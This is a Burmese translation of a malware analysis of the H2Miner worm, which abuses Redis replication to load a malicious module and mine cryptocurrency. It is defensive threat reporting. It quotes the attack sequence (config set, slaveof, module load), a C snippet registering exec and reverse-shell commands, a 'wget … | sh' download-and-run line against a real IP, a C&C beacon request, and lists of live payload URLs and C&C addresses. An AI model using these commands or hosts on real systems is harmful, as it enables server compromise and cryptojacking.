Redis RCE ကို အသုံးချသည့် H2Miner သန်ကောင်များ ဖြစ်ပွားမှုအသစ်ကို ရှာဖွေတွေ့ရှိခဲ့သည်။

လွန်ခဲ့သောတစ်ရက်က၊ ကျွန်ုပ်၏ပရောဂျက်၏ဆာဗာများထဲမှတစ်ခုသည် အလားတူ worm မှတိုက်ခိုက်ခံခဲ့ရသည်။ "ဒါကဘာလဲ" ဆိုတဲ့မေးခွန်းရဲ့အဖြေကိုရှာဖွေပါ။ Alibaba Cloud Security အဖွဲ့မှ ကောင်းမွန်သော ဆောင်းပါးတစ်ပုဒ်ကို ကျွန်ုပ်တွေ့ရှိခဲ့သည်။ Habre တွင် ဤဆောင်းပါးကို ရှာမတွေ့သောကြောင့်၊ သင့်အတွက် အထူးသဖြင့် ၎င်းကို ဘာသာပြန်ရန် ဆုံးဖြတ်ခဲ့သည် <3

entry ကို

မကြာသေးမီက Alibaba Cloud ၏ လုံခြုံရေးအဖွဲ့သည် H2Miner ရုတ်တရက်ဖြစ်ပွားမှုကို တွေ့ရှိခဲ့သည်။ ဤအန္တရာယ်ရှိသော worm အမျိုးအစားသည် Redis အတွက် တရားဝင်ခွင့်ပြုချက်မရှိခြင်း သို့မဟုတ် အားနည်းသောစကားဝှက်များကို သင့်စနစ်များသို့ဝင်ပေါက်များအဖြစ် အသုံးပြုပြီး၊ ထို့နောက်တွင် ၎င်းသည် ၎င်း၏ကိုယ်ပိုင်အန္တရာယ်ရှိသော module ကိုကျွန်နှင့် master-slave synchronization မှတဆင့်ကျွန်နှင့်ထပ်တူပြုပြီး နောက်ဆုံးတွင် ဤအန္တရာယ်ရှိသော module ကိုတိုက်ခိုက်ခံရသောစက်သို့ဒေါင်းလုဒ်လုပ်ကာ အန္တရာယ်ရှိသောလုပ်ဆောင်မှုကိုလုပ်ဆောင်သည်။ ညွှန်ကြားချက်များ။

ယခင်က၊ သင်၏စနစ်များပေါ်တွင် တိုက်ခိုက်သူများသည် Redis သို့ဝင်ရောက်ပြီးနောက် သင့်စက်သို့ စာရေးထားသော အလုပ်များ သို့မဟုတ် SSH သော့များပါ၀င်သည့်နည်းလမ်းကို အသုံးပြုပြီး အဓိကအားဖြင့် လုပ်ဆောင်ခဲ့ကြသည်။ ကံကောင်းထောက်မစွာ၊ ခွင့်ပြုချက်ထိန်းချုပ်မှုပြဿနာများ သို့မဟုတ် မတူညီသောစနစ်ဗားရှင်းများကြောင့် ဤနည်းလမ်းကို မကြာခဏအသုံးပြု၍မရပါ။ သို့သော်၊ အန္တရာယ်ရှိသော module တစ်ခုအားတင်ခြင်း၏ဤနည်းလမ်းသည် တိုက်ခိုက်သူ၏အမိန့်များကို တိုက်ရိုက်လုပ်ဆောင်နိုင်သည် သို့မဟုတ် သင့်စနစ်အတွက် အန္တရာယ်ရှိသော shell သို့ဝင်ရောက်ခွင့်ရရှိနိုင်သည်။

အရေအတွက်များပြားမှုကြောင့် ဆာဗာများ Redis instance ၁ သန်းနီးပါးကို အွန်လိုင်းတွင် host လုပ်ထားသောကြောင့် Alibaba Cloud ၏ လုံခြုံရေးအဖွဲ့သည် ခင်မင်ရင်းနှီးသော သတိပေးချက်တစ်ခုအနေဖြင့် အသုံးပြုသူများသည် Redis ကို ကွန်ရက်မှ ဝင်ရောက်ခွင့်မပေးရန်နှင့် ၎င်းတို့၏ စကားဝှက်များ၏ ခိုင်မာမှုနှင့် brute force ကို ခံနိုင်ရည်ရှိမှုရှိမရှိကို ပုံမှန်စစ်ဆေးရန် အကြံပြုထားသည်။

H2Miner

H2Miner သည် အောက်ပါတို့ကို အခြေခံသည့် စနစ်များအတွက် mining botnet တစ်ခုဖြစ်သည်။ Linux၎င်းသည် ခွင့်ပြုချက်မရှိဘဲ Hadoop yarn၊ Docker နှင့် Redis remote command execution (RCE) အားနည်းချက်အပါအဝင် နည်းလမ်းအမျိုးမျိုးဖြင့် သင့်စနစ်ကို ထိုးဖောက်ဝင်ရောက်နိုင်သည်။ botnet သည် သင့်ဒေတာကို တူးဖော်ရန် အန္တရာယ်ရှိသော script များနှင့် malware များကို ဒေါင်းလုဒ်လုပ်ခြင်း၊ တိုက်ခိုက်မှုကို ဘေးတိုက်ချဲ့ထွင်ခြင်းနှင့် command-and-control (C&C) ဆက်သွယ်မှုများကို ထိန်းသိမ်းခြင်းဖြင့် လုပ်ဆောင်သည်။

Redis RCE

ဤအကြောင်းအရာနှင့်ပတ်သက်သည့် အသိပညာကို ZeroNights 2018 တွင် Pavel Toporkov မှ မျှဝေခဲ့ပါသည်။ ဗားရှင်း 4.0 ပြီးနောက်၊ Redis သည် အသုံးပြုသူများအား သီးခြား Redis အမိန့်ပေးချက်များကို လုပ်ဆောင်ရန်အတွက် C နှင့် စုစည်းထားသော ဖိုင်များကို Redis သို့ သွင်းနိုင်စေမည့် plug-in loading အင်္ဂါရပ်ကို ပံ့ပိုးပေးပါသည်။ ဤလုပ်ဆောင်ချက်သည် အသုံးဝင်သော်လည်း၊ master-slave မုဒ်တွင် ဖိုင်များကို fullresync မုဒ်မှတစ်ဆင့် slave နှင့် ထပ်တူပြုနိုင်သည့် အားနည်းချက်တစ်ခုပါရှိသည်။ အန္တရာယ်ရှိသော ဖိုင်များကို လွှဲပြောင်းရန် တိုက်ခိုက်သူမှ ၎င်းကို အသုံးပြုနိုင်သည်။ လွှဲပြောင်းမှုပြီးသွားသောအခါ၊ တိုက်ခိုက်သူများသည် တိုက်ခိုက်ခံရသော Redis instance တွင် module ကို တင်ကာ မည်သည့် command ကိုမဆို လုပ်ဆောင်သည်။

Malware Worm ခွဲခြမ်းစိတ်ဖြာခြင်း။

မကြာသေးမီက Alibaba Cloud လုံခြုံရေးအဖွဲ့က H2Miner အန္တရာယ်ရှိသော မိုင်းတွင်းအုပ်စု၏ အရွယ်အစားသည် ရုတ်တရက် သိသိသာသာ တိုးလာကြောင်း တွေ့ရှိခဲ့သည်။ ခွဲခြမ်းစိတ်ဖြာမှုအရ တိုက်ခိုက်မှုဖြစ်ပွားခြင်း၏ ယေဘုယျဖြစ်စဉ်မှာ အောက်ပါအတိုင်းဖြစ်သည်။

H2Miner သည် အပြည့်အဝတိုက်ခိုက်ရန်အတွက် RCE Redis ကိုအသုံးပြုသည်။ တိုက်ခိုက်သူများသည် အားနည်းသော စကားဝှက်များဖြင့် အကာအကွယ်မဲ့ Redis ဆာဗာများ သို့မဟုတ် ဆာဗာများကို ဦးစွာ တိုက်ခိုက်သည်။

ပြီးရင် သူတို့ အမိန့်ပေးတယ်။ config set dbfilename red2.so ဖိုင်အမည်ကိုပြောင်းလဲရန်။ ယင်းနောက်၊ တိုက်ခိုက်သူများသည် အမိန့်ကို လုပ်ဆောင်သည်။ slaveof master-slave ကူးယူမှုလက်ခံသူလိပ်စာကို သတ်မှတ်ရန်။

တိုက်ခိုက်ခံရသော Redis စံနမူနာသည် တိုက်ခိုက်သူပိုင်ဆိုင်သည့် အန္တရာယ်ရှိသော Redis နှင့် master-slave ချိတ်ဆက်မှုတစ်ခုကို တည်ဆောက်သောအခါ၊ တိုက်ခိုက်သူသည် ဖိုင်များကို synchronize လုပ်ရန် fullresync command ကိုအသုံးပြု၍ ကူးစက်ထားသော module ကို ပေးပို့သည်။ ထို့နောက် red2.so ဖိုင်ကို တိုက်ခိုက်ခံရသော စက်သို့ ဒေါင်းလုဒ်လုပ်ပါမည်။ ထို့နောက် တိုက်ခိုက်သူများသည် ဤ so ဖိုင်ကို တင်ရန် ./red2.so loading module ကို အသုံးပြုသည်။ မော်ဂျူးသည် တိုက်ခိုက်သူထံမှ ညွှန်ကြားချက်များကို လုပ်ဆောင်နိုင်သည် သို့မဟုတ် တိုက်ခိုက်ခံရသော စက်သို့ ဝင်ရောက်ခွင့်ရရန် ပြောင်းပြန်ချိတ်ဆက်မှု (backdoor) ကို စတင်နိုင်သည်။

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

ကဲ့သို့သော အန္တရာယ်ရှိသော အမိန့်ကို အကောင်အထည်ဖော်ပြီးနောက် / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1တိုက်ခိုက်သူသည် အရန်ဖိုင်အမည်ကို ပြန်လည်သတ်မှတ်ပြီး သဲလွန်စများကို ရှင်းလင်းရန် စနစ် module ကို လွှင့်တင်မည်ဖြစ်သည်။ သို့သော်၊ red2.so ဖိုင်သည် တိုက်ခိုက်ခံရသောစက်တွင် ကျန်ရှိနေမည်ဖြစ်သည်။ အသုံးပြုသူများသည် ၎င်းတို့၏ Redis ဥပမာ၏ ဖိုဒါတွင် သံသယဖြစ်ဖွယ်ဖိုင်တစ်ခု ရှိနေခြင်းကို အာရုံစိုက်ရန် အကြံပြုအပ်ပါသည်။

အရင်းအမြစ်များကို ခိုးယူရန် အန္တရာယ်ရှိသော လုပ်ငန်းစဉ်အချို့ကို သတ်ပစ်သည့်အပြင်၊ တိုက်ခိုက်သူသည် အန္တရာယ်ရှိသော binary ဖိုင်များကို ဒေါင်းလုဒ်လုပ်ပြီး လုပ်ဆောင်ခြင်းဖြင့် အန္တရာယ်ရှိသော script ကို လိုက်နာခဲ့သည်။ 142.44.191.122/ အမျိုးအနွယ်. ဆိုလိုသည်မှာ host တွင် kinsing ပါရှိသော လုပ်ငန်းစဉ်အမည် သို့မဟုတ် လမ်းညွှန်အမည်သည် ထိုစက်ကို ဤဗိုင်းရပ်စ်ပိုး ကူးစက်ခံထားရကြောင်း ဖော်ပြနိုင်သည်။

ပြောင်းပြန်အင်ဂျင်နီယာရလဒ်များအရ malware သည် အောက်ပါလုပ်ဆောင်ချက်များကို အဓိကအားဖြင့် လုပ်ဆောင်သည်-

• ဖိုင်များတင်ခြင်းနှင့် ၎င်းတို့ကို လုပ်ဆောင်ခြင်း
• သတ္တုတွင်း
• C&C ဆက်သွယ်ရေးကို ထိန်းသိမ်းခြင်းနှင့် တိုက်ခိုက်သူ အမိန့်ပေးချက်များကို လုပ်ဆောင်ခြင်း။

သင်၏သြဇာလွှမ်းမိုးမှုကိုချဲ့ထွင်ရန် ပြင်ပစကန်ဖတ်ခြင်းအတွက် Masscan ကိုသုံးပါ။ ထို့အပြင်၊ C&C ဆာဗာ၏ IP လိပ်စာကို ပရိုဂရမ်တွင် hard-code လုပ်ပြီး တိုက်ခိုက်ခံရသော host သည် HTTP တောင်းဆိုချက်များကို အသုံးပြုကာ C&C ဆက်သွယ်မှုဆာဗာနှင့် ဆက်သွယ်မည်ဖြစ်ပြီး၊ HTTP ခေါင်းစီးတွင် ဖုတ်ကောင် (အပေးအယူခံရသောဆာဗာ) အချက်အလက်များကို HTTP ခေါင်းစီးတွင် ဖော်ထုတ်ထားသည်။

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

အခြားတိုက်ခိုက်ရေးနည်းလမ်းများ

တီကောင်အသုံးပြုသော လိပ်စာများနှင့် လင့်ခ်များ

/ အမျိုးအနွယ်

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

ကောင်စီ

ပထမဦးစွာ Redis ကိုအင်တာနက်မှဝင်ရောက်၍မရနိုင်ပါ၊ ခိုင်မာသောစကားဝှက်ဖြင့်ကာကွယ်ထားသင့်သည်။ Redis directory တွင် red2.so ဖိုင်မရှိကြောင်းနှင့် host ရှိ file/process name တွင် "kinsing" မရှိကြောင်းကိုလည်း client များက စစ်ဆေးရန် အရေးကြီးပါသည်။

source: www.habr.com